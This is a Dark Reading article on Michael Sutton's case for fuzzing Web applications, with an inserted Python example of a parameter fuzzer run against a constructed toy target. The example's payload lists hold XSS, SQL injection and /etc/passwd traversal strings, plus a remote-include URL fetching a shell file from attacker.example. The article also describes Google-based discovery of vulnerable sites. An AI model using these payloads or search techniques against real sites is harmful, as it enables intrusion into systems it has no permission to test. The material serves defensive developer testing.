Here Comes the (Web) Fuzz

Black Hat researcher says fuzzing Web applications is the next big thing, will release free tool

Fuzzing has traditionally been a popular tool for hackers searching for network-based vulnerabilities -- but not so much for Web applications. That soon could change, however, according to a Black Hat researcher who says fuzzing is even better suited for finding flaws in Web applications.

Michael Sutton, security evangelist for SPI Dynamics, this week at the Black Hat DC briefings in Arlington, Va., will release a free homegrown Web fuzzing tool that he developed, called Web Fuzz. Fuzzers are automated testing tools that feed an application random, malformed, or otherwise unexpected input (a request, a packet, a form field) and watch for crashes, error messages, or other anomalous responses that indicate a vulnerability.

Because the fuzzing process can be highly automated, it is a natural fit for Web app developers, Sutton says. Web apps also accept user input in very structured ways (query strings, form fields, cookies, headers), which tells a fuzzer exactly where to inject.

Today's Web technology makes it especially simple to develop Web apps. That means less technical users are building these apps, too. "It would never be realistic that my Web developers would do reverse-engineering to find vulnerabilities. But it would be realistic for them to use a tool they are comfortable with like fuzzing during the development process," says Sutton, who will discuss Web app fuzzing in his "Smashing Web Apps: Applying Fuzzing to Web Applications and Web Services" session at Black Hat.

"The beauty of fuzzing is its simplicity," he says.

Web applications are wearing a big bull's eye lately for vulnerabilities -- about half of all vulnerabilities reported today are Web app-based ones, Sutton says. XSS, SQL injection, and PHP file include (all Web-related flaws) were the top three vulnerability classes in CVE for 2006, Sutton notes. And because Web apps have very standardized ways of accepting user input, a fuzzer can exploit that structure, he says. (See Cross-Site Scripting: Attackers' New Favorite Flaw.)

"Web apps are very well-geared for fuzzing."
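The following is an added example, not code from the article or from Sutton's Web Fuzz tool, of the approach the preceding paragraphs describe: take a request whose parameters are known, substitute attack strings for one parameter at a time, and look for response indicators of the three classes the article cites (XSS, SQL injection, PHP file include). The target, `toy_app`, is a constructed, deliberately vulnerable in-process function standing in for a real Web application so the script runs offline; the payload and indicator lists are small illustrative sets, not a complete corpus.

```python
"""Minimal parameter-aware Web fuzzer (added example, not the article's tool).

Each known request parameter is replaced in turn with attack strings, the
response is compared against a baseline, and recognisable indicators are
reported as findings."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

# Attack strings per vulnerability class (a tiny seed set; real runs use many more).
PAYLOADS: Dict[str, List[str]] = {
    "xss": ["<script>fuzz()</script>", '"><fuzz>'],
    "sqli": ["'", "1' OR '1'='1", "1 UNION SELECT 1"],
    "php-include": ["../../../../etc/passwd", "http://attacker.example/shell.txt"],
}

# Error strings that show the payload reached a database or the filesystem.
# XSS is judged by verbatim, unencoded reflection of the payload instead.
INDICATORS: Dict[str, List[str]] = {
    "sqli": [
        r"You have an error in your SQL syntax",
        r"unterminated quoted string",
        r"ORA-\d{5}",
        r"SQLSTATE\[",
    ],
    "php-include": [
        r"root:x:0:0:",
        r"failed to open stream",
        r"No such file or directory",
    ],
}


@dataclass(frozen=True)
class Finding:
    param: str
    vuln_class: str
    payload: str
    evidence: str


# The "transport": takes request parameters, returns the response body.
# In a real fuzzer this wraps an HTTP client; here it is an in-process function.
Responder = Callable[[Dict[str, str]], str]


def classify(vuln_class: str, payload: str, body: str) -> Optional[str]:
    """Return the evidence string if the response indicates vuln_class, else None."""
    if vuln_class == "xss":
        # Only an unencoded reflection counts; an HTML-escaped echo is fine.
        return payload if payload in body else None
    for pattern in INDICATORS[vuln_class]:
        match = re.search(pattern, body)
        if match:
            return match.group(0)
    return None


def fuzz_request(base_params: Dict[str, str], send: Responder) -> List[Finding]:
    """Fuzz one parameter at a time, keeping the others at their normal values."""
    # Baseline response: an indicator that is present without any payload
    # (e.g. a page that always prints a stale DB error) is noise, not a finding.
    baseline = send(dict(base_params))
    findings: List[Finding] = []
    for name in base_params:
        for vuln_class, payloads in PAYLOADS.items():
            for payload in payloads:
                params = dict(base_params)
                params[name] = payload
                evidence = classify(vuln_class, payload, send(params))
                if evidence and evidence not in baseline:
                    findings.append(Finding(name, vuln_class, payload, evidence))
    return findings


def toy_app(params: Dict[str, str]) -> str:
    """Constructed vulnerable target (not a real product) that mimics the
    error output of a careless PHP application."""
    page = params.get("page", "home")
    query = params.get("q", "")
    user = params.get("user", "")
    # 'page' goes straight into include(): traversal or a URL leaks an error.
    if ".." in page or page.startswith("http"):
        return "Warning: include(%s): failed to open stream" % page
    # 'q' is echoed without HTML encoding: reflected XSS.
    body = "<h1>Results for %s</h1>" % query
    # 'user' is concatenated into SQL: a stray quote breaks the statement.
    if "'" in user:
        body += "<p>You have an error in your SQL syntax; check the manual</p>"
    return body


if __name__ == "__main__":
    for f in fuzz_request({"page": "home", "q": "", "user": "bob"}, toy_app):
        print(f"{f.param:5} {f.vuln_class:12} payload={f.payload!r} evidence={f.evidence!r}")
```

Run against `toy_app` with the parameters shown, the fuzzer reports the `page` parameter for PHP file include, `q` for XSS, and `user` for SQL injection, and nothing else. The baseline comparison is the check a practitioner would want: without it, a site that always emits a database warning would be flagged for every SQL payload. As Sutton says, this finds the easy bugs only; a flaw that needs several requests in sequence, or a valid session, is invisible to a one-parameter-at-a-time fuzzer.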

But fuzzing won't solve Web application security troubles. "It's not a silver bullet. It has its limitations," Sutton says. "It's not going to find that complex vulnerability or that multi-stage attack."

It will make things easier on Web developers, however, who don't necessarily have vendors to fall back on when bugs arise in their apps. "You're totally on your own. You created the app, you created the vulnerability, and it's your responsibility to create the fix for it," Sutton says. "In the best case, you find it, and the worst case, someone else finds it externally... There's no global notification system [for these bugs]."

With a fuzzer, a Web services developer could then easily test her Web app before it goes live. "It used to be that you'd assemble the security team, and that was OK with network layer vulnerabilities, because they could find them and were empowered to fix them." You could throw up a firewall or IDS to plug a buffer overflow in an app, Sutton says.

"But in the Web app world, the security team isn't empowered to fix the holes. They can't just block off traffic. The only way to fix it is at the development side," he says. "And if we don't involve developers, they are going to make the same [security] mistakes over and over again."

It's the easy stuff that fuzzers can pinpoint, Sutton says. He calls it the "FUGGLE" phenomenon: Fuzzing Using Google Gets Low-Hanging Fruit Easily. "The power of fuzzing with Google is you can Google for sites that are going to be vulnerable to attack. Then you make a request for them using Google fuzzing to see if they could find indicators of what vulnerabilities" are there, he says.

Sutton says a combination of search engine queries and basic Web page requests can identify previously unknown vulnerabilities, so it would also be simple for phishers and spammers to use the same techniques to find their targets.

Meanwhile, Sutton says his Web Fuzz tool is not related to his company's commercial scanner, SPI Dynamics' WebInspect, which ships with built-in fuzzing. OWASP also offers a free fuzzer, WSFuzzer, he notes. Aside from SPI Dynamics, Beyond Security and Mu Security are some other vendors who sell commercial fuzzing tools, he says. Researcher HD Moore also offers his AxMan ActiveX fuzzing tool for free. (See Free Fuzzing Tool Launched.)

— Kelly Jackson Higgins, Senior Editor, Dark Reading
